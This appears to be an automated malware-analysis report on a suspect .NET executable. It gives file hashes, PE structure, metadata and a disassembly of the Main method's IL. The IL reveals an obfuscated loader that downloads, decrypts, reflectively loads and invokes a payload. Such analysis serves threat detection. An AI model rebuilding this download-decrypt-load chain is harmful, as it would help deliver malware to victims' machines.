Suspicious
Suspect

4cd1d0541ccdc209f7c170619e188c0c

PE Executable | MD5: 4cd1d0541ccdc209f7c170619e188c0c | Size: 60.42 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score

Medium

Hash
Hash Value
MD5
4cd1d0541ccdc209f7c170619e188c0c
Sha1
b31960bbc74ecfa75dd698c762b177babf8b0e66
Sha256
2e685c9a958286d812c049791bc376bfea13d997b790530fc29b0528a9242cbb
Sha384
114295f59d6e84e3db4ae09e5fe23ef26b5ea0e4e72f2dd16950a15d376fa10dc1956ab900f824a684a7cbd9846c21f5
Sha512
bde423dffee0bc499677de8186e180a4abc89b240b7ad2ba2b778b403014f639396891d031ad2bd7d1cb05c0cf8b147dd7338c171a7e43c351be7843675fb3f8
SSDeep
1536:9SSCObS8gxff2vWhSZlouL00mKYGe8QNKuzTM:9S5KfW+ehSZyuL00mKY3NL0
TLSH
4F434A0CA799FA15D63C497EC4F14300E3B5D6956503FB7FADC0A86D98C23FA1602A8B

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
XQVhn
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Jdahvqpvhpz.exe

Full Name

Jdahvqpvhpz.exe

EntryPoint

System.Void Ctwuwupp.Xdptg::Main()

Scope Name

Jdahvqpvhpz.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Jdahvqpvhpz

Assembly Version

1.0.1525.20223

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.6

Total Strings

11

Main Method

System.Void Ctwuwupp.Xdptg::Main()

Main IL Instruction Count

89

Main IL

newobj System.Void Ctwuwupp.Xdptg/a::.ctor() stloc.0 <null> br.s IL_0035: ldc.i4.s 38 ldc.i4 30209 call System.String i::a(System.Int32) stloc.1 <null> br.s IL_003D: ldc.i4.s -37 ldc.i4 30621 call System.String i::a(System.Int32) stloc.2 <null> br.s IL_0045: ldc.i4.s 80 ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 dup <null> brfalse.s IL_002D: ldc.i4.0 ldc.i4.1 <null> br.s IL_0030: brtrue.s IL_0061 ldc.i4.0 <null> br.s IL_0030: brtrue.s IL_0061 brtrue.s IL_0061: newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) pop <null> br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 38 ldc.i4.s -125 bgt.s IL_0008: ldc.i4 30209 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s -37 ldc.i4.s -7 blt.s IL_0015: ldc.i4 30621 br.s IL_004B: ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldc.i4.s 80 ldc.i4.s 23 bgt.s IL_0022: ldsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Byte[] Ctwuwupp.Xdptg/<>c::a() newobj System.Void System.Func`1<System.Byte[]>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`1<System.Byte[]> Ctwuwupp.Xdptg/<>c::<>9__0_0 newobj System.Void Ctwuwupp.Edymvvbabv::.ctor(System.Func`1<System.Byte[]>) ldloc.0 <null> ldloc.1 <null> ldloc.2 <null> newobj System.Void Ctwuwupp.Pdgviblx::.ctor(System.String,System.String) stfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> newobj System.Void Ctwuwupp.Nthqih::.ctor() stfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldc.i4 30634 call System.String i::a(System.Int32) ldc.i4 30714 call System.String i::a(System.Int32) newobj System.Void Ctwuwupp.Trresb::.ctor(System.String,System.String) stfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c dup <null> ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::a(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt 
System.Void Ctwuwupp.Edymvvbabv::add_DownloadCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Pdgviblx Ctwuwupp.Xdptg/a::a ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::b(System.IO.MemoryStream) newobj System.Void System.Action`1<System.IO.MemoryStream>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Pdgviblx::add_DecryptionCompleted(System.Action`1<System.IO.MemoryStream>) ldloc.0 <null> ldfld Ctwuwupp.Nthqih Ctwuwupp.Xdptg/a::b ldloc.0 <null> ldftn System.Void Ctwuwupp.Xdptg/a::c(System.Reflection.Assembly) newobj System.Void System.Action`1<System.Reflection.Assembly>::.ctor(System.Object,System.IntPtr) callvirt System.Void Ctwuwupp.Nthqih::add_LoadCompleted(System.Action`1<System.Reflection.Assembly>) ldloc.0 <null> ldfld Ctwuwupp.Trresb Ctwuwupp.Xdptg/a::c ldsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 dup <null> brfalse.s IL_00EE: ldc.i4.0 ldc.i4.1 <null> br.s IL_00F1: brtrue.s IL_010A ldc.i4.0 <null> br.s IL_00F1: brtrue.s IL_010A brtrue.s IL_010A: callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) pop <null> ldsfld Ctwuwupp.Xdptg/<>c Ctwuwupp.Xdptg/<>c::<>9 ldftn System.Void Ctwuwupp.Xdptg/<>c::b() newobj System.Void System.Action::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Action Ctwuwupp.Xdptg/<>c::<>9__0_4 callvirt System.Void Ctwuwupp.Trresb::add_InvocationCompleted(System.Action) callvirt System.Void Ctwuwupp.Edymvvbabv::Zuowogw() ret <null>

